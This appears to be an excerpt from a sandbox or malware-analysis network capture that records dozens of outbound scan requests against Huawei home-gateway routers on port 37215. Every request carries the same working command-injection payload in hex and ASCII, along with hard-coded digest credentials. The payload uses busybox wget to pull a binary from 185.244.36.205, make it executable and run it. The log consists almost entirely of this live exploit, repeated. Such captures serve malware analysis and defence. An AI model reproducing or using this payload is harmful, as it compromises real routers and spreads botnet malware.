                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1521192.168.2.1548558138.123.81.3337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643965960 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1522192.168.2.1555166160.28.125.23637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643985987 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1523192.168.2.1543742121.195.31.9837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644021988 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1524192.168.2.1557260122.6.19.22537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644026995 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1525192.168.2.154616435.69.85.9137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644051075 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1526192.168.2.1551092197.68.233.3037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644057989 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1527192.168.2.154707241.185.157.22537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644073963 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1528192.168.2.155166837.142.173.8937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644119978 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1529192.168.2.1560092181.211.209.12037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644123077 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1530192.168.2.154477294.215.113.3937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644144058 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
